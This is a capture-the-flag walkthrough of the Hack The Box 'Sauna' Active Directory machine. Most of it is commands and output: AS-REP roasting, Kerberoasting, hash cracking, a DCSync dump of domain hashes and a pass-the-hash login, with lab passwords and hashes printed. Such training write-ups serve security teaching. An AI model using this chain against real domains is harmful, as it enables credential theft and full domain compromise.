HTB: AD — sauna

Machine Info

Spoiler

Sauna is an easy difficulty Windows machine that features Active Directory enumeration and exploitation. Possible usernames can be derived from employee full names listed on the website. With these usernames, an ASREPRoasting attack can be performed, which results in hash for an account that doesn’t require Kerberos pre-authentication. This hash can be subjected to an offline brute force attack, in order to recover the plaintext password for a user that is able to WinRM to the box. Running WinPEAS reveals that another system user has been configured to automatically login and it identifies their password. This second user also has Windows remote management permissions. BloodHound reveals that this user has the DS-Replication-Get-Changes-All extended right, which allows them to dump password hashes from the Domain Controller in a DCSync attack. Executing this attack returns the hash of the primary domain administrator, which can be used with Impacket’s psexec.py in order to gain a shell on the box as NT_AUTHORITY\SYSTEM.

User

Reconnaissance

We are going to start by running our nmap scan:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
└─$ ports=$(nmap -p- --min-rate=1000 -T4 10.129.95.180 | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)

└─$ nmap -p$ports -sC -sV 10.129.95.180 
Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-17 16:18 CET
Nmap scan report for 10.129.95.180
Host is up (0.068s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Egotistical Bank :: Home
| http-methods: 
|_  Potentially risky methods: TRACE
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2026-01-17 22:18:49Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf        .NET Message Framing
49667/tcp open  msrpc         Microsoft Windows RPC
49673/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49674/tcp open  msrpc         Microsoft Windows RPC
49676/tcp open  msrpc         Microsoft Windows RPC
49692/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 7h00m00s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2026-01-17T22:19:41
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 96.51 seconds

We will add the domain(EGOTISTICAL-BANK.LOCAL) and the hostname(SAUNA.EGOTISTICAL-BANK.LOCAL) in the /etc/hosts file.

Continuing our web enumeration we don’t find much but one page gives us supposedly the names of the internal team.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
└─$ gobuster dir -u http://sauna.egotistical-bank.local -w /usr/share/seclists/Discovery/Web-Content/big.txt -t 50 -x html,bak,txt
===============================================================
Gobuster v3.8
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://sauna.egotistical-bank.local
[+] Method:                  GET
[+] Threads:                 50
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/big.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.8
[+] Extensions:              html,bak,txt
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/About.html           (Status: 200) [Size: 30954]
/Blog.html            (Status: 200) [Size: 24695]
/Contact.html         (Status: 200) [Size: 15634]
/Images               (Status: 301) [Size: 167] [--> http://sauna.egotistical-bank.local/Images/]
/Index.html           (Status: 200) [Size: 32797]
/about.html           (Status: 200) [Size: 30954]
/blog.html            (Status: 200) [Size: 24695]
/contact.html         (Status: 200) [Size: 15634]
/css                  (Status: 301) [Size: 164] [--> http://sauna.egotistical-bank.local/css/]
/fonts                (Status: 301) [Size: 166] [--> http://sauna.egotistical-bank.local/fonts/]
/images               (Status: 301) [Size: 167] [--> http://sauna.egotistical-bank.local/images/]
/index.html           (Status: 200) [Size: 32797]
/single.html          (Status: 200) [Size: 38059]
Progress: 81924 / 81924 (100.00%)
===============================================================
Finished
===============================================================

Here are the names we get in the about.html.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
<div class="row">
    <div class="col-sm-4 service-1-w3pvt serve-gd3">
        <div class="serve-grid test-gd mt-4">
            <img src="images/t1.jpg" alt="" class="img-fluid image1">
            <p class="mt-2">Fergus Smith </p>
        </div>
        <div class="serve-grid test-gd mt-4">
            <img src="images/t2.jpg" alt="" class="img-fluid image1">
            <p class="mt-2">Hugo Bear </p>
        </div>
        <div class="serve-grid test-gd mt-4">
            <img src="images/t3.jpg" alt="" class="img-fluid image1">
            <p class="mt-2">Steven Kerb </p>
        </div>
    </div>

    <div class="col-sm-4 service-1-w3pvt serve-gd2">
        <div class="serve-grid test-gd mt-4">
            <img src="images/te2.jpg" alt="" class="img-fluid image1">
            <p class="mt-2">Shaun Coins </p>
        </div>
        <div class="serve-grid test-gd mt-4">
            <img src="images/te1.jpg" alt="" class="img-fluid image1">
            <p class="mt-2">Bowie Taylor </p>
        </div>
    </div>
    <div class="col-sm-4 service-1-w3pvt serve-gd1">
        <div class="serve-grid test-gd mt-4">
            <img src="images/t4.jpg" alt="" class="img-fluid image1">
            <p class="mt-2">Sophie Driver </p>
        </div>
    </div>

</div>

These could be internal AD users if we are lucky. Let’s enumerate them with impacket-GetNPUsers but first we are going to create the possible usernames with username-anarchy! We give the user names found as first and last name per line and it will create all possible usernames from these.

1
username-anarchy --input-file users.txt > users2.txt       

1
2
3
4
5
6
7
8
9
└─$ impacket-GetNPUsers EGOTISTICAL-BANK.LOCAL/ -usersfile users2.txt -dc-ip 10.129.95.180 
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:87be45447465b32e0e7e0405b6b5472f$27a37c8b644372a4695d88ac2061dfbc4309ffb28f7b9b331233e5949fb0aae8ce7807572e503e348be98a78e3b94c7c6bdf4ac8d9720af816149de8e50ec0cd4a7da0904962909d5f09baf425bd7f614805d694cedad43cc52d9e39ed4df72a447fc708ff87f7b66bb2b4aeddb63d5e1788b2058391a0b98751fa896cded0695f42a5f0a606b333cdd0776eaff60f909cd4dc02ad1207f7e9b5c16dbf6b04874c01b3bb4a0e147ac764d28d9d2fee2f0f129775219492cb219598ba2d81f9b4d3258bb32ec0faa6ace30d3358cbd5b1cc0605dacf586ab5d09afc9e3898c44fe6f088995cb4226090cc6b7073313e0a498073555ca6e7db8babdbf2f035b3ca
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)

Bingo! We get the AS-REP hash for user fsmith as the only one that exists in the AD.

Let’s crack it.

1
2
3
4
5
6
└─$ hashcat -m 18200 fsmith.hash /usr/share/wordlists/rockyou.txt.gz 
...
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 18200 (Kerberos 5, etype 23, AS-REP)
....

FSmith's Cracked hash

[email protected]:87be45447465b32e0e7e0405b6b5472f$27a37c8b644372a4695d88ac2061dfbc4309ffb28f7b9b331233e5949fb0aae8ce7807572e503e348be98a78e3b94c7c6bdf4ac8d9720af816149de8e50ec0cd4a7da0904962909d5f09baf425bd7f614805d694cedad43cc52d9e39ed4df72a447fc708ff87f7b66bb2b4aeddb63d5e1788b2058391a0b98751fa896cded0695f42a5f0a606b333cdd0776eaff60f909cd4dc02ad1207f7e9b5c16dbf6b04874c01b3bb4a0e147ac764d28d9d2fee2f0f129775219492cb219598ba2d81f9b4d3258bb32ec0faa6ace30d3358cbd5b1cc0605dacf586ab5d09afc9e3898c44fe6f088995cb4226090cc6b7073313e0a498073555ca6e7db8babdbf2f035b3ca:Thestrokes23

Using evil-winrm we get a shell and the user.txt.

Root

Post-Enumeration

Enumerating our posture and the domain we will launch Bloodhound. First we collect the data from our attacker machine.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
└─$ bloodhound-python -d egotistical-bank.local -u fsmith -p '<PASSWORD>' -dc SAUNA.EGOTISTICAL-BANK.LOCAL -ns 10.129.95.180 -c all
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: egotistical-bank.local
INFO: Getting TGT for user
INFO: Connecting to LDAP server: SAUNA.EGOTISTICAL-BANK.LOCAL
WARNING: Kerberos auth to LDAP failed, trying NTLM
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: SAUNA.EGOTISTICAL-BANK.LOCAL
WARNING: Kerberos auth to LDAP failed, trying NTLM
INFO: Found 7 users
INFO: Found 52 groups
INFO: Found 3 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: SAUNA.EGOTISTICAL-BANK.LOCAL
WARNING: Failed to get service ticket for SAUNA.EGOTISTICAL-BANK.LOCAL, falling back to NTLM auth
CRITICAL: CCache file is not found. Skipping...
WARNING: DCE/RPC connection failed: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
INFO: Done in 00M 13S

Looking at the user we see another account named hsmith. We see it is kerberoasrtable so we get its credentials.

1
2
3
4
5
6
7
└─$ faketime 'Mon Jan 19 06:43:00 2026' impacket-GetUserSPNs EGOTISTICAL-BANK.LOCAL/fsmith -dc-ip 10.129.95.180 -request -outputfile kerberoast.hashes
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

Password:
ServicePrincipalName                      Name    MemberOf  PasswordLastSet             LastLogon  Delegation 
----------------------------------------  ------  --------  --------------------------  ---------  ----------
SAUNA/HSmith.EGOTISTICALBANK.LOCAL:60111  HSmith            2020-01-23 06:54:34.140321  <never>               

1
2
3
4
5
6
7
8
└─$ hashcat -m 13100  kerberoast.hashes /usr/share/wordlists/rockyou.txt.gz 
hashcat (v7.1.2) starting

...
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
...

HSmith's password

Thestrokes23

DCSync

This led us though to no attack path for privileges escalation. Looking at Bloodhound output we see also another service account that has some interesting outbound object controls!

These two ACLs can be used to perform a DCSync attack! This makes this account a target for us privilege escalation.

As a next step let’s continue with winPeas and see if we get anything.

1
*Evil-WinRM* PS C:\Users\FSmith\Documents> .\winPEASx64.exe

Looking at the output we get Autologin credentials for that account.

Autologin credentials

1
2
3
4
5
╔══════════╣ Looking for AutoLogon credentials
    Some AutoLogon credentials were found
    DefaultDomainName             :  EGOTISTICALBANK
    DefaultUserName               :  EGOTISTICALBANK\svc_loanmanager
    DefaultPassword               :  Moneymakestheworldgoround!

Now our attack path is easy and set, we perform a DCSync attack and gather the Administrator’s hash.

Administrator NT Hash

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
└─$ impacket-secretsdump EGOTISTICAL-BANK/[email protected]
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

Password:
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4a8899428cad97676ff802229e466e2c:::
EGOTISTICAL-BANK.LOCAL\HSmith:1103:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\FSmith:1105:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:1108:aad3b435b51404eeaad3b435b51404ee:9cb31797c39a9b170b04058ba2bba48c:::
SAUNA$:1000:aad3b435b51404eeaad3b435b51404ee:47ffe5972eb49901e0cbe6f8c1627664:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:42ee4a7abee32410f470fed37ae9660535ac56eeb73928ec783b015d623fc657
Administrator:aes128-cts-hmac-sha1-96:a9f3769c592a8a231c3c972c4050be4e
Administrator:des-cbc-md5:fb8f321c64cea87f
krbtgt:aes256-cts-hmac-sha1-96:83c18194bf8bd3949d4d0d94584b868b9d5f2a54d3d6f3012fe0921585519f24
krbtgt:aes128-cts-hmac-sha1-96:c824894df4c4c621394c079b42032fa9
krbtgt:des-cbc-md5:c170d5dc3edfc1d9
EGOTISTICAL-BANK.LOCAL\HSmith:aes256-cts-hmac-sha1-96:5875ff00ac5e82869de5143417dc51e2a7acefae665f50ed840a112f15963324
EGOTISTICAL-BANK.LOCAL\HSmith:aes128-cts-hmac-sha1-96:909929b037d273e6a8828c362faa59e9
EGOTISTICAL-BANK.LOCAL\HSmith:des-cbc-md5:1c73b99168d3f8c7
EGOTISTICAL-BANK.LOCAL\FSmith:aes256-cts-hmac-sha1-96:8bb69cf20ac8e4dddb4b8065d6d622ec805848922026586878422af67ebd61e2
EGOTISTICAL-BANK.LOCAL\FSmith:aes128-cts-hmac-sha1-96:6c6b07440ed43f8d15e671846d5b843b
EGOTISTICAL-BANK.LOCAL\FSmith:des-cbc-md5:b50e02ab0d85f76b
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes256-cts-hmac-sha1-96:6f7fd4e71acd990a534bf98df1cb8be43cb476b00a8b4495e2538cff2efaacba
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes128-cts-hmac-sha1-96:8ea32a31a1e22cb272870d79ca6d972c
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:des-cbc-md5:2a896d16c28cf4a2
SAUNA$:aes256-cts-hmac-sha1-96:0c3a42221337aa834b85e08e443be85f2bad531875eabb3a15766f02b6b8fb24
SAUNA$:aes128-cts-hmac-sha1-96:5b5006ca3579bbe190fb7810ba32a4de
SAUNA$:des-cbc-md5:54f1c785efc8e989
[*] Cleaning up... 

To get the root.txt we just authenticate as Administrator and Pass the Hash.

1
evil-winrm -i 10.129.95.210 -u Administrator -H <HASH>

Machine Info#

User#

Reconnaissance#

Root#

Post-Enumeration#

DCSync#